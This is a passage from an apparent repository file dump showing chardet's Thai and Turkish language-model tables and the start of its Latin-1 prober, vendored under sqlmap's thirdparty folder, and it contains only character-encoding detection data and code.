3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0,\n0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0,\n0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,\n3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1,\n2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,\n0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0,\n3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0,\n0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,\n2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0,\n1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,\n1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,\n1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,\n1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n)\n\nTIS620ThaiModel = {\n  'char_to_order_map': TIS620CharToOrderMap,\n  'precedence_matrix': ThaiLangModel,\n  'typical_positive_ratio': 0.926386,\n  'keep_english_letter': False,\n  'charset_name': \"TIS-620\",\n  'language': 'Thai',\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/langturkishmodel.py",
    "content": "# -*- coding: utf-8 -*-\n######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Özgür Baskın - Turkish Language Model\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# 255: Control characters that usually does not exist in any text\n# 254: Carriage/Return\n# 253: symbol (punctuation) that does not belong to word\n# 252: 0 - 9\n\n# Character Mapping Table:\nLatin5_TurkishCharToOrderMap = (\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,\n255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,\n255, 23, 37, 47, 39, 29, 52, 36, 45, 53, 60, 16, 49, 20, 46, 42,\n 48, 69, 44, 35, 31, 51, 38, 62, 65, 43, 56,255,255,255,255,255,\n255,  1, 21, 28, 12,  2, 18, 27, 25,  3, 24, 10,  5, 13,  4, 15,\n 26, 64,  7,  8,  9, 14, 32, 57, 58, 11, 22,255,255,255,255,255,\n180,179,178,177,176,175,174,173,172,171,170,169,168,167,166,165,\n164,163,162,161,160,159,101,158,157,156,155,154,153,152,151,106,\n150,149,148,147,146,145,144,100,143,142,141,140,139,138,137,136,\n 94, 80, 93,135,105,134,133, 63,132,131,130,129,128,127,126,125,\n124,104, 73, 99, 79, 85,123, 54,122, 98, 92,121,120, 91,103,119,\n 68,118,117, 97,116,115, 50, 90,114,113,112,111, 55, 41, 40, 86,\n 89, 70, 59, 78, 71, 82, 88, 33, 77, 66, 84, 83,110, 75, 61, 96,\n 30, 67,109, 74, 87,102, 34, 95, 81,108, 76, 72, 17,  6, 19,107,\n)\n\nTurkishLangModel = (\n3,2,3,3,3,1,3,3,3,3,3,3,3,3,2,1,1,3,3,1,3,3,0,3,3,3,3,3,0,3,1,3,\n3,2,1,0,0,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,2,2,0,0,1,0,0,1,\n3,2,2,3,3,0,3,3,3,3,3,3,3,2,3,1,0,3,3,1,3,3,0,3,3,3,3,3,0,3,0,3,\n3,1,1,0,1,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,2,2,0,0,0,1,0,1,\n3,3,2,3,3,0,3,3,3,3,3,3,3,2,3,1,1,3,3,0,3,3,1,2,3,3,3,3,0,3,0,3,\n3,1,1,0,0,0,1,0,0,0,0,1,1,0,1,2,1,0,0,0,1,0,0,0,0,2,0,0,0,0,0,1,\n3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,1,3,3,2,0,3,2,1,2,2,1,3,3,0,0,0,2,\n2,2,0,1,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,1,0,0,1,\n3,3,3,2,3,3,1,2,3,3,3,3,3,3,3,1,3,2,1,0,3,2,0,1,2,3,3,2,1,0,0,2,\n2,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,2,0,0,0,\n1,0,1,3,3,1,3,3,3,3,3,3,3,1,2,0,0,2,3,0,2,3,0,0,2,2,2,3,0,3,0,1,\n2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,0,3,2,0,2,3,2,3,3,1,0,0,2,\n3,2,0,0,1,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,1,1,1,0,2,0,0,1,\n3,3,3,2,3,3,2,3,3,3,3,2,3,3,3,0,3,3,0,0,2,1,0,0,2,3,2,2,0,0,0,2,\n2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,0,2,0,0,1,\n3,3,3,2,3,3,3,3,3,3,3,2,3,3,3,0,3,2,0,1,3,2,1,1,3,2,3,2,1,0,0,2,\n2,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,\n3,3,3,2,3,3,3,3,3,3,3,2,3,3,3,0,3,2,2,0,2,3,0,0,2,2,2,2,0,0,0,2,\n3,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,2,0,1,0,0,0,\n3,3,3,3,3,3,3,2,2,2,2,3,2,3,3,0,3,3,1,1,2,2,0,0,2,2,3,2,0,0,1,3,\n0,3,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,\n3,3,3,2,3,3,3,2,1,2,2,3,2,3,3,0,3,2,0,0,1,1,0,1,1,2,1,2,0,0,0,1,\n0,3,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,\n3,3,3,2,3,3,2,3,2,2,2,3,3,3,3,1,3,1,1,0,3,2,1,1,3,3,2,3,1,0,0,1,\n1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,2,0,0,1,\n3,2,2,3,3,0,3,3,3,3,3,3,3,2,2,1,0,3,3,1,3,3,0,1,3,3,2,3,0,3,0,3,\n2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,\n2,2,2,3,3,0,3,3,3,3,3,3,3,3,3,0,0,3,2,0,3,3,0,3,2,3,3,3,0,3,1,3,\n2,0,0,0,0,0,0,0,0,0,0,1,0,1,2,0,1,0,0,0,0,0,0,0,2,2,0,0,1,0,0,1,\n3,3,3,1,2,3,3,1,0,0,1,0,0,3,3,2,3,0,0,2,0,0,2,0,2,0,0,0,2,0,2,0,\n0,3,1,0,1,0,0,0,2,2,1,0,1,1,2,1,2,2,2,0,2,1,1,0,0,0,2,0,0,0,0,0,\n1,2,1,3,3,0,3,3,3,3,3,2,3,0,0,0,0,2,3,0,2,3,1,0,2,3,1,3,0,3,0,2,\n3,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,1,3,3,2,2,3,2,2,0,1,2,3,0,1,2,1,0,1,0,0,0,1,0,2,2,0,0,0,1,\n1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,\n3,3,3,1,3,3,1,1,3,3,1,1,3,3,1,0,2,1,2,0,2,1,0,0,1,1,2,1,0,0,0,2,\n2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,1,0,2,1,3,0,0,2,0,0,3,3,0,3,0,0,1,0,1,2,0,0,1,1,2,2,0,1,0,\n0,1,2,1,1,0,1,0,1,1,1,1,1,0,1,1,1,2,2,1,2,0,1,0,0,0,0,0,0,1,0,0,\n3,3,3,2,3,2,3,3,0,2,2,2,3,3,3,0,3,0,0,0,2,2,0,1,2,1,1,1,0,0,0,1,\n0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,\n3,3,3,3,3,3,2,1,2,2,3,3,3,3,2,0,2,0,0,0,2,2,0,0,2,1,3,3,0,0,1,1,\n1,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,\n1,1,2,3,3,0,3,3,3,3,3,3,2,2,0,2,0,2,3,2,3,2,2,2,2,2,2,2,1,3,2,3,\n2,0,2,1,2,2,2,2,1,1,2,2,1,2,2,1,2,0,0,2,1,1,0,2,1,0,0,1,0,0,0,1,\n2,3,3,1,1,1,0,1,1,1,2,3,2,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,\n0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,2,2,2,3,2,3,2,2,1,3,3,3,0,2,1,2,0,2,1,0,0,1,1,1,1,1,0,0,1,\n2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,2,0,1,0,0,0,\n3,3,3,2,3,3,3,3,3,2,3,1,2,3,3,1,2,0,0,0,0,0,0,0,3,2,1,1,0,0,0,0,\n2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,\n3,3,3,2,2,3,3,2,1,1,1,1,1,3,3,0,3,1,0,0,1,1,0,0,3,1,2,1,0,0,0,0,\n0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,\n3,3,3,2,2,3,2,2,2,3,2,1,1,3,3,0,3,0,0,0,0,1,0,0,3,1,1,2,0,0,0,1,\n1,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,\n1,1,1,3,3,0,3,3,3,3,3,2,2,2,1,2,0,2,1,2,2,1,1,0,1,2,2,2,2,2,2,2,\n0,0,2,1,2,1,2,1,0,1,1,3,1,2,1,1,2,0,0,2,0,1,0,1,0,1,0,0,0,1,0,1,\n3,3,3,1,3,3,3,0,1,1,0,2,2,3,1,0,3,0,0,0,1,0,0,0,1,0,0,1,0,1,0,0,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,2,0,0,2,2,1,0,0,1,0,0,3,3,1,3,0,0,1,1,0,2,0,3,0,0,0,2,0,1,1,\n0,1,2,0,1,2,2,0,2,2,2,2,1,0,2,1,1,0,2,0,2,1,2,0,0,0,0,0,0,0,0,0,\n3,3,3,1,3,2,3,2,0,2,2,2,1,3,2,0,2,1,2,0,1,2,0,0,1,0,2,2,0,0,0,2,\n1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,\n3,3,3,0,3,3,1,1,2,3,1,0,3,2,3,0,3,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,\n1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,3,3,0,3,3,2,3,3,2,2,0,0,0,0,1,2,0,1,3,0,0,0,3,1,1,0,3,0,2,\n2,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,1,2,2,1,0,3,1,1,1,1,3,3,2,3,0,0,1,0,1,2,0,2,2,0,2,2,0,2,1,\n0,2,2,1,1,1,1,0,2,1,1,0,1,1,1,1,2,1,2,1,2,0,1,0,1,0,0,0,0,0,0,0,\n3,3,3,0,1,1,3,0,0,1,1,0,0,2,2,0,3,0,0,1,1,0,1,0,0,0,0,0,2,0,0,0,\n0,3,1,0,1,0,1,0,2,0,0,1,0,1,0,1,1,1,2,1,1,0,2,0,0,0,0,0,0,0,0,0,\n3,3,3,0,2,0,2,0,1,1,1,0,0,3,3,0,2,0,0,1,0,0,2,1,1,0,1,0,1,0,1,0,\n0,2,0,1,2,0,2,0,2,1,1,0,1,0,2,1,1,0,2,1,1,0,1,0,0,0,1,1,0,0,0,0,\n3,2,3,0,1,0,0,0,0,0,0,0,0,1,2,0,1,0,0,1,0,0,1,0,0,0,0,0,2,0,0,0,\n0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,2,1,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,0,0,2,3,0,0,1,0,1,0,2,3,2,3,0,0,1,3,0,2,1,0,0,0,0,2,0,1,0,\n0,2,1,0,0,1,1,0,2,1,0,0,1,0,0,1,1,0,1,1,2,0,1,0,0,0,0,1,0,0,0,0,\n3,2,2,0,0,1,1,0,0,0,0,0,0,3,1,1,1,0,0,0,0,0,1,0,0,0,0,0,2,0,1,0,\n0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,\n0,0,0,3,3,0,2,3,2,2,1,2,2,1,1,2,0,1,3,2,2,2,0,0,2,2,0,0,0,1,2,1,\n3,0,2,1,1,0,1,1,1,0,1,2,2,2,1,1,2,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,\n0,1,1,2,3,0,3,3,3,2,2,2,2,1,0,1,0,1,0,1,2,2,0,0,2,2,1,3,1,1,2,1,\n0,0,1,1,2,0,1,1,0,0,1,2,0,2,1,1,2,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,\n3,3,2,0,0,3,1,0,0,0,0,0,0,3,2,1,2,0,0,1,0,0,2,0,0,0,0,0,2,0,1,0,\n0,2,1,1,0,0,1,0,1,2,0,0,1,1,0,0,2,1,1,1,1,0,2,0,0,0,0,0,0,0,0,0,\n3,3,2,0,0,1,0,0,0,0,1,0,0,3,3,2,2,0,0,1,0,0,2,0,1,0,0,0,2,0,1,0,\n0,0,1,1,0,0,2,0,2,1,0,0,1,1,2,1,2,0,2,1,2,1,1,1,0,0,1,1,0,0,0,0,\n3,3,2,0,0,2,2,0,0,0,1,1,0,2,2,1,3,1,0,1,0,1,2,0,0,0,0,0,1,0,1,0,\n0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,2,0,0,0,1,0,0,1,0,0,2,3,1,2,0,0,1,0,0,2,0,0,0,1,0,2,0,2,0,\n0,1,1,2,2,1,2,0,2,1,1,0,0,1,1,0,1,1,1,1,2,1,1,0,0,0,0,0,0,0,0,0,\n3,3,3,0,2,1,2,1,0,0,1,1,0,3,3,1,2,0,0,1,0,0,2,0,2,0,1,1,2,0,0,0,\n0,0,1,1,1,1,2,0,1,1,0,1,1,1,1,0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,0,0,\n3,3,3,0,2,2,3,2,0,0,1,0,0,2,3,1,0,0,0,0,0,0,2,0,2,0,0,0,2,0,0,0,\n0,1,1,0,0,0,1,0,0,1,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,\n3,2,3,0,0,0,0,0,0,0,1,0,0,2,2,2,2,0,0,1,0,0,2,0,0,0,0,0,2,0,1,0,\n0,0,2,1,1,0,1,0,2,1,1,0,0,1,1,2,1,0,2,0,2,0,1,0,0,0,2,0,0,0,0,0,\n0,0,0,2,2,0,2,1,1,1,1,2,2,0,0,1,0,1,0,0,1,3,0,0,0,0,1,0,0,2,1,0,\n0,0,1,0,1,0,0,0,0,0,2,1,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,\n2,0,0,2,3,0,2,3,1,2,2,0,2,0,0,2,0,2,1,1,1,2,1,0,0,1,2,1,1,2,1,0,\n1,0,2,0,1,0,1,1,0,0,2,2,1,2,1,1,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,\n3,3,3,0,2,1,2,0,0,0,1,0,0,3,2,0,1,0,0,1,0,0,2,0,0,0,1,2,1,0,1,0,\n0,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,1,0,1,1,1,0,1,0,0,0,0,0,0,0,0,0,\n0,0,0,2,2,0,2,2,1,1,0,1,1,1,1,1,0,0,1,2,1,1,1,0,1,0,0,0,1,1,1,1,\n0,0,2,1,0,1,1,1,0,1,1,2,1,2,1,1,2,0,1,1,2,1,0,2,0,0,0,0,0,0,0,0,\n3,2,2,0,0,2,0,0,0,0,0,0,0,2,2,0,2,0,0,1,0,0,2,0,0,0,0,0,2,0,0,0,\n0,2,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,\n0,0,0,3,2,0,2,2,0,1,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,\n2,0,1,0,1,0,1,1,0,0,1,2,0,1,0,1,1,0,0,1,0,1,0,2,0,0,0,0,0,0,0,0,\n2,2,2,0,1,1,0,0,0,1,0,0,0,1,2,0,1,0,0,1,0,0,1,0,0,0,0,1,2,0,1,0,\n0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,2,1,0,1,1,1,0,0,0,0,1,2,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,\n1,1,2,0,1,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2,0,0,0,0,0,1,\n0,0,1,2,2,0,2,1,2,1,1,2,2,0,0,0,0,1,0,0,1,1,0,0,2,0,0,0,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,\n2,2,2,0,0,0,1,0,0,0,0,0,0,2,2,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,\n0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n2,2,2,0,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,1,0,0,0,0,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n)\n\nLatin5TurkishModel = {\n  'char_to_order_map': Latin5_TurkishCharToOrderMap,\n  'precedence_matrix': TurkishLangModel,\n  'typical_positive_ratio': 0.970290,\n  'keep_english_letter': True,\n  'charset_name': \"ISO-8859-9\",\n  'language': 'Turkish',\n}\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/latin1prober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 2001\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#   Shy Shalom - original C code\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetprober import CharSetProber\nfrom .enums import ProbingState\n\nFREQ_CAT_NUM = 4\n\nUDF = 0  # undefined\nOTH = 1  # other\nASC = 2  # ascii capital letter\nASS = 3  # ascii small letter\nACV = 4  # accent capital vowel\nACO = 5  # accent capital other\nASV = 6  # accent small vowel\nASO = 7  # accent small other\nCLASS_NUM = 8  # total classes\n\nLatin1_CharToClass = (\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 00 - 07\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 08 - 0F\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 10 - 17\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 18 - 1F\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 20 - 27\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 28 - 2F\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 30 - 37\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 38 - 3F\n    OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC,   # 40 - 47\n    ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC,   # 48 - 4F\n    ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC,   # 50 - 57\n    ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH,   # 58 - 5F\n    OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS,   # 60 - 67\n    ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS,   # 68 - 6F\n    ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS,   # 70 - 77\n    ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH,   # 78 - 7F\n    OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH,   # 80 - 87\n    OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF,   # 88 - 8F\n    UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 90 - 97\n    OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO,   # 98 - 9F\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # A0 - A7\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # A8 - AF\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # B0 - B7\n    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # B8 - BF\n    ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO,   # C0 - C7\n    ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV,   # C8 - CF\n    ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH,   # D0 - D7\n    ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO,   # D8 - DF\n    ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO,   # E0 - E7\n    ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV,   # E8 - EF\n    ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH,   # F0 - F7\n   